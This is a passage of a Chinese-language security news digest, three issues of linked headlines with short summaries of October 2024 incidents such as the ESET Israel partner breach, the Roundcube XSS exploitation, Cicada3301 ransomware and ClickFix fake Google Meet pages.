https://www.bleepingcomputer.com/news/security/eset-partner-breached-to-send-data-wipers-to-israeli-orgs/ 据观察，这一钓鱼活动从10月8日开始，这些邮件带有ESET 徽标且从合法的 eset.co.il 域发送，表明以色列分部的电子邮件服务器在攻击中遭到破坏，ESET 告诉 BleepingComputer，他们位于以色列的分销商由Comsecure 运营。 7、涉案金额达 1 亿元，四川公安打掉刷单控评“网络水军”团伙 https://www.ithome.com/0/803/385.htm 今年 3 月，内江市中区公安网警在工作中发现一款名为“某某战队”的微信小程序，打着“99 看播”“躺赚”等噱头，招募全国各地人员充当“网络水军”从事网络虚假刷单行为。 8、美国保险巨头遭数据勒索攻击，影响大量客户个人信息 https://www.secrss.com/articles/71364 尽管此次事件未对公司的运营造成重大影响，Globe Life仍对可能被窃取的数据表示担忧，因为这一事件有可能波及数百万人。 9、新加坡网络安全局发布《AI系统安全指南》 https://www.secrss.com/articles/71410 继新加坡在2024年5月30日发布的《生成式人工智能的治理框架》，2024年9月 23日新加坡最高人民法院发布《关于法院用户使用生成式人工智能工具指南》之后，新加坡又双叒叕发布和AI安全有关的指南。 10、马斯克：允许第三方使用X平台用户数据训练AI https://www.freebuf.com/news/413349.html 社交媒体平台X（原Twitter）于2024年10月16日更新其隐私政策，宣布将允许第三方合作伙伴使用X平台上的用户数据来训练人工智能模型，除非用户选择退出。这一政策变动表明，X正在效仿Reddit和其他媒体机构，寻求通过向AI公司授权数据来获取新的收入来源。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、美日军事演习引发俄罗斯对日本的DDoS攻击 https://www.asahi.com/ajw/articles/15469220 由于日本与美国计划于2024年10月23日至11月1日进行联合军事演习“利剑25号”，俄方黑客组织在本周对日本多个网站发起了分布式拒绝服务（DDoS）攻击。此次攻击针对日本执政党、自民党、制造企业、商业团体和地方政府，导致部分网站瘫痪数小时。山梨县政府网站遭到来自69个国家的620万次访问，瘫痪近五小时。自称“NoName057(16)”的黑客团体声称对攻击负责，表示此举是对日本“反俄行动”的惩罚。分析显示，攻击主要来源于知名网络和VPN，目标包括船舶制造和物流公司、政府及政治组织。 2、数千万用户使用的E2EE云存储平台发现严重漏洞 https://brokencloudstorage.info/ 瑞士苏黎世联邦理工学院的研究人员发现多个端到端加密（E2EE）云存储平台存在严重安全漏洞，可能使用户数据面临泄露风险。受影响的平台包括Sync、pCloud、Icedrive、Seafile和Tresorit，用户总数超过2200万。漏洞允许攻击者通过恶意服务器注入文件、篡改数据或获取用户文件，违背了这些平台对客户的加密保障承诺。尤其是Sync和pCloud的加密密钥未经认证，Icedrive和Seafile的文件篡改防护薄弱。尽管Tresorit的问题较少，但研究表明其元数据仍有被篡改的可能。多数供应商正在修复这些漏洞，但I 3、黑客利用Roundcube Webmail XSS漏洞窃取登录凭证 https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/fake-attachment-roundcube-mail-server-attacks-exploit-cve-2024-37383-vulnerability 黑客正在利用开源Roundcube Webmail软件中的一个已修复的存储型跨站脚本（XSS）漏洞，发起钓鱼攻击以窃取用户登录凭据。该漏洞编号为CVE-2024-37383，影响Roundcube的1.5.7和1.6.7版本之前的版本。攻击者通过发送特制邮件，嵌入恶意JavaScript代码，在用 4、The Internet Archive再次因访问令牌被盗而遭入侵 https://www.bleepingcomputer.com/news/security/internet-archive-breached-again-through-stolen-access-tokens/ The Internet Archive再次被黑客入侵，这次黑客通过Zendesk电子邮件支持平台的窃取访问令牌发动攻击。尽管多次警告其GitLab认证令牌被曝光，该组织未能及时更新其API密钥，导致黑客获得对80多万条支持票据的访问权限。这些票据中包含用户请求删除信息的敏感数据，甚至可能包括个人身份信息。此次攻击发生在此前Internet Archive的3300万用户数据泄 5、科技巨头Nidec确认勒索软件攻击后数据泄露 https://www.nidec.com/jp/nidec-precision/corporate/news/2024%E5%B9%B4/20241017_%20incident_2/ 全球知名精密马达制造商Nidec Corporation证实，黑客通过勒索软件攻击窃取了数据，并在暗网泄露。此次攻击未加密文件，但黑客通过泄露数据进行敲诈。Nidec Precision 分部的服务器在遭入侵后，黑客窃取了超过50000份文件，涉及内部文档、业务伙伴信件、采购合同和健康安全政策等。尽管公司未支付赎金，数据泄露仍可能导致员工和合作伙伴面临定向网络钓鱼等后续威胁。8BASE 和Everest勒索 6、朝鲜黑客伪装IT求职者窃取数据后勒索雇主 https://www.secureworks.com/blog/fraudulent-north-korean-it-worker-schemes 朝鲜IT工人通过伪装身份进入西方企业工作，窃取机密数据并威胁泄露以勒索巨额赎金。据研究人员的调查，朝鲜长期通过这种手段获取企业网络的访问权限，进而为其武器项目筹资。最近的研究表明，这些工人不仅盗取数据，还通过虚假身份和技术手段隐匿行踪，避开视频会议的面部识别。某些案例中，黑客利用企业的虚拟桌面基础设施（VDI）将数据转移到个人云存储，并使用VPN和远程访问工具如AnyDesk进行恶意活动。企业需谨慎筛选远程员工，防范潜在风险。 7、新的macOS漏洞允许攻击者绕过安全控制 https://cybersecuritynews.com/macos-vulnerability-bypass-security-controls/ 微软威胁情报发现，macOS出现了一个名为“HM Surf”的新漏洞，能允许攻击者绕过操作系统的透明、同意和控制（TCC）技术，在未经授权的情况下访问用户受保护的数据。 8、东盟成立区域级CERT应对AI时代的网络威胁 https://www.secrss.com/articles/71397 10月16日，第九届东盟网络安全部长级会议（AMCC）及系列会议在新加坡举行，会议汇集了东盟10个成员国的电信和网络安全部长。 9、《电力交易数据安全分类分级管理规范》等3项团体标准公开征求意见 https://www.ttbz.org.cn/Home/Show/75259/ 《电力交易数据安全分类分级管理规范》、《电子银行安全评估过程实施指南》和《个人信息保护合规管理实施指南》三项团体标准已完成征求意见稿，现公开征求意见。 10、Mirai变种大猩猩僵尸网络攻击了100个国家的30多万个目标 https://www.anquanke.com/post/id/301079 据网络安全公司 NSFOCUS 称，一个新的大猩猩僵尸网络发起了大规模 DDoS 攻击，目标遍及 100 多个国家。该僵尸网络利用 Mirai 僵尸网络源代码和先进技术，构成了日益严重的全球性威胁。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、Cicada3301勒索软件运营曝光推出新合作计划 https://www.group-ib.com/blog/cicada3301/ 网络安全研究人员深入了解了新兴的勒索软件即服务（RaaS）平台Cicada3301的运营模式。研究表明，Cicada3301通过在暗网上的Affiliate面板管理其合作伙伴，并招募渗透测试员和访问经纪人，提供20%的佣金。该勒索软件基于Rust语言，支持Windows、Linux等多个平台，允许合作伙伴对多个行业的目标进行攻击。Cicada3301不仅加密文件，还通过关闭虚拟机和删除系统恢复点来最大化破坏力。其复杂的工具和数据窃取策略使其迅速成为勒索软件领域的重大威胁。 2、芬兰海关捣毁暗网毒品市场Sipulitie并查封服务器 https://tulli.fi/-/suomen-tulli-sulki-salatussa-tor-verkossa-toimineen-sipulitie-kauppapaikan 芬兰海关在欧盟刑警组织、瑞典及波兰执法机构和Bitdefender研究人员的协助下，成功关闭了自2023年运营的Tor暗网市场Sipulitie，并查封了其服务器。Sipulitie主要用于匿名贩卖毒品，月营业额高达130万欧元。此次行动还识别出平台的主要运营者和用户，并计划进行逮捕。Sipulitie是此前被取缔的Sipulimarket的继任者，调查仍在进行，更多细节有望在未来几个月公布。 3、微软披露macOS Safari隐私漏洞或被用于绕过用户权限 https://www.microsoft.com/en-us/security/blog/2024/10/17/new-macos-vulnerability-hm-surf-could-lead-to-unauthorized-data-access/ 微软公开了一项已修补的macOS漏洞（CVE-2024-44133），可能被用于绕过Safari浏览器的隐私控制并访问用户数据。该漏洞被微软称为“HM Surf”，通过修改Safari目录中的配置文件，攻击者可未经用户同意访问摄像头、麦克风和定位信息。虽然苹果已在macOS Sequoia 15中移除了易受攻击的代码，但微软发现这一漏洞可 4、Crypt Ghouls组织利用共享工具发起对俄攻击 https://securelist.com/crypt-ghouls-hacktivists-tools-overlap-analysis/114217/ 据研究人员最新报告，“Crypt Ghouls”组织自去年12月起，持续对俄罗斯企业和政府机构发起勒索软件攻击。调查显示，该组织与其他攻击俄罗斯的黑客团伙存在工具、基础设施以及战术技术重叠，使用的工具包括Mimikatz、PingCastle、AnyDesk等，以及广为流行的勒索软件LockBit 3.0和Babuk。攻击者常通过入侵分包商的账户实施攻击，这使得精准识别幕后黑手更加复杂化。由于黑客组织之间共享工具和基础设施，识别具体攻击 5、ClickFix活动假冒Google Meet网页传播信息窃取器 https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/#h-context 近日，假冒的Google Meet网页成为网络犯罪分子在“ClickFix”恶意软件活动中的新工具，目标为Windows和macOS系统。攻击者通过伪造的网页显示错误信息，诱骗用户复制并执行恶意的PowerShell代码，最终感染设备。研究人员报告指出，ClickFix活动广泛利用假冒网站，如Google Meet、Zoom等，部署StealC和Rhadamanthys窃取器，macOS用户则遭受Atomic窃取器攻击。这一手法通过用户手动执行代码来绕过安全工 6、朝鲜IT工人伪装求职窃取数据后勒索雇主 https://www.secureworks.com/blog/fraudulent-north-korean-it-worker-schemes 朝鲜IT工人通过伪装身份进入西方企业工作，窃取机密数据并威胁泄露以勒索巨额赎金。据研究人员的调查，朝鲜长期通过这种手段获取企业网络的访问权限，进而为其武器项目筹资。最近的研究表明，这些工人不仅盗取数据，还通过虚假身份和技术手段隐匿行踪，避开视频会议的面部识别。某些案例中，黑客利用企业的虚拟桌面基础设施（VDI）将数据转移到个人云存储，并使用VPN和远程访问工具如AnyDesk进行恶意活动。企业需谨慎筛选远程员工，防范潜在风险。 7、Intel与AMD处理器曝出新Spectre绕过漏洞影响Linux系统 https://www.bleepingcomputer.com/news/security/intel-amd-cpus-on-linux-impacted-by-newly-disclosed-spectre-bypass/ 最新的Intel处理器（包括Xeon服务器芯片）以及AMD的早期架构在Linux系统上曝出新的推测执行攻击，绕过了现有的Spectre防护。受影响的处理器包括Intel的第12至14代消费级处理器及第5、6代Xeon服务器芯片，以及AMD的Zen 1、Zen 1+、Zen 2架构处理器。瑞士联邦理工学院（ETH Zurich）的研究人员发现，该漏洞可以绕过关键防御机 8、美国摧毁Anonymous Sudan DDoS攻击行动 https://www.bleepingcomputer.com/news/security/us-disrupts-anonymous-sudan-ddos-operation-indicts-2-sudanese-brothers/ 美国司法部今日对两名苏丹兄弟Ahmed Salah Yousif Omer（22岁）和Alaa Salah Yusuuf Omer（27岁）提出起诉，指控他们为黑客组织Anonymous Sudan的操控者。该组织自2023年成立以来，发起了超过35000次的分布式拒绝服务（DDoS）攻击，造成全球范围内服务中断，影响了包括Cloudflare、Micros 9、黑客盗取客户数据后勒索Globe Life https://www.sec.gov/Archives/edgar/data/320335/000032033524000056/gl-20241017.htm 保险巨头Globe Life报告称，未知黑客组织试图勒索该公司，以换取不公开其今年早些时候被盗的客户数据。Globe Life在6月13日披露数据泄露事件，称其网络门户在审查访问权限和用户身份管理时发现了漏洞，可能导致消费者和保单持有者数据被访问。最新的SEC文件显示，受影响的客户主要来自其子公司American Income Life Insurance Company，初步估计至少有5000名客户的数据被盗。盗取的数据类型包括 10、苹果缩短网站安全证书有效期提案遭部分站长反对 https://stock.10jqka.com.cn/20241016/c662468504.shtml 苹果缩短网站安全证书有效期从 398 天到 45 天的提议，引起了部分站长和系统管理员的公开反对。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。